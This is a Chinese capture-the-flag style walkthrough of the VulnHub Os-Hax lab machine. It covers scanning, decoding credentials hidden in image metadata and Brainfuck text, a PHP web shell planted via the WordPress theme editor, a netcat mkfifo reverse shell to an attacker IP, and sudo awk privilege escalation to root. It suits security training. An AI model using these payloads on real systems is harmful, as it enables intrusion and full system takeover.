【原创】靶机系列测试教程 Os-Hax
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
1.1 交流平台
随着教程的推出,看视频的人也越来越多,随之而来的问题也增多,本人平时非常忙,难以有时间回复大家的问题,特意建立了一个QQ群,里面有很多这方面的高手,有什么不懂的,请到群里提问,问问题的时候,一定要详细,不然没人会回复你,另外本人有时间会在群内直播测试靶机,还没加上群的赶快加上了。

1.2 靶机介绍

下载地址
https://www.vulnhub.com/entry/hacknos-os-hax,389/
难度 为中级
2 测试过程
2.1 nmap探测端口信息
nmap -sV -sC- 192.168.0.156 -oA os-hax-allports

2.2 gobuster扫描目录
gobuster dir -u http://192.168.0.156 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/img (Status: 301)
/html (Status: 301)
/css (Status: 301)
/wordpress (Status: 301)
/js (Status: 301)
/server-status (Status: 403)
2.3 通过图片获取字符目录
访问目录 /img/发现存在目录写浏览

下载 flaghost.png 查看图片属性 exiftool flaghost.png 得到字符 passwd@45

2.5 获取wordpress账号和密码
passwd@45编码之后访问获取flag2.txt
i+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- —<]
>–.- –.<+ +++++ [->– —-< ]>— -.<++ +[->+ ++<]> +++++ .<+++ ++[->
+++++ <]>.+ +.+++ +++++ .—- –.<+ ++[-> +++<] >++++ .<+++ ++++[ ->—
—-< ]>-.< +++[- >—< ]>— .+.– –.++ +.<
https://www.splitbrain.org/services/ook
解密字符 web:Hacker@4514
2.5 获取shell权限
首先编辑vi /etc/hosts
192.168.0.156 localhost
访问 http://localhost/wordpress/wp-admin/theme-editor.php?file=header.php&theme=twentynineteen
写入<?php system($_POST[‘cmd’]);?>

2.6 反弹shell
nc -lvnp 9001
cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.124+9001+>/tmp/f

切换python shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’

2.7 登录web用户
su web 输入密码 Hacker@4514

2.8 特权提升
sudo -l 看到可以使用awk 命令

调用system函数成功提权到root
sudo awk ‘{ system(“/bin/bash”)}’

3.修复建议
- 升级Ubuntu版本
- 修改/etc/sudoers 文件
- apache 目录 设置不可浏览
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/694.html